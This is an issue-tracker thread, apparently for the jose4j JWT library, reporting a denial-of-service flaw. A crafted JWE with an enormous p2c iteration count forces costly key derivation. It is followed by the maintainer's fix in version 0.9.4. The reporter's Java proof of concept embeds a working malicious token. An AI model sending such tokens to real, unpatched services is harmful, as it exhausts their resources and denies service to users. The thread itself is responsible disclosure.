- marked as critical
- edited description
- changed title to Dos Attack Via specifically crafted JWE
Dos Attack Via specifically crafted JWE
Description
The JWE key management algorithms based on PBKDF2 require a JOSE Header Parameter called p2c (PBES2 Count). This parameter dictates the number of PBKDF2 iterations needed to derive a CEK wrapping key. Its primary purpose is to intentionally slow down the key derivation function, making password brute-force and dictionary attacks more resource-intensive.
Therefore, if an attacker sets the p2c parameter in JWE to a very large number, it can cause a lot of computational consumption, resulting in a DOS attack
POC
import org.jose4j.jwa.AlgorithmConstraints;
import org.jose4j.jwe.ContentEncryptionAlgorithmIdentifiers;
import org.jose4j.jwe.JsonWebEncryption;
import org.jose4j.jwe.KeyManagementAlgorithmIdentifiers;
import org.jose4j.keys.AesKey;
import org.jose4j.lang.ByteUtil;
import java.security.Key;
public class jwt {
public static void main(String[] argc)throws Exception{
Key key = new AesKey(ByteUtil.randomBytes(16));
JsonWebEncryption jwe = new JsonWebEncryption();
jwe.setAlgorithmConstraints(new AlgorithmConstraints(AlgorithmConstraints.ConstraintType.PERMIT,
KeyManagementAlgorithmIdentifiers.PBES2_HS256_A128KW));
jwe.setContentEncryptionAlgorithmConstraints(new AlgorithmConstraints(AlgorithmConstraints.ConstraintType.PERMIT,
ContentEncryptionAlgorithmIdentifiers.AES_128_CBC_HMAC_SHA_256));
jwe.setKey(key);
jwe.setCompactSerialization("eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJ1RWxQUGhJLThGY2h3a1BhIn0=.JOIw8ccIdkor7-ZaHQz6pUkqj2VEL_XIuonOwdSrdeXxFb7qN8FZKw.1-ZgAG8KzCbl6wDjUzrsTw.0pLJ0ZEu9OMYV1jyfPIrqg.gFNkCEwB1lf_Jovc7ZOd5w");
System.out.println("Payload: " + jwe.getPayload());
}
}
Recommendations
Set an upper limit for p2c, e.g. 100000.
Comments (4)
-
reporter -
repo owner - changed status to open
Thanks for raising this Jesse. I actually looked into this some a while back after this talk/white-paper[1] came out. The few production applications that I had access to were all using JWE AlgorithmConstraints such that they wouldn't even process a PBES2 JWE. So it didn't seem real urgent and I put it on the back burner intending to address it later. But honestly then sort of forgot about it. So thanks for bringing it back into the attention queue. The library should have some better default protections. Like a max p2c but also adding the PBES2 algs to default JWE AlgorithmConstraints to be blocked.
-
repo owner - changed status to resolved
Add the PBES2 algorithms to JWE's default blocked AlgorithmConstraints and put a max on the iteration count to fix Issue
#212→ <<cset 1afaa1e174b3>>
-
repo owner - changed status to closed
jose4j-0.9.4 has the fix(s) for this
- Log in to comment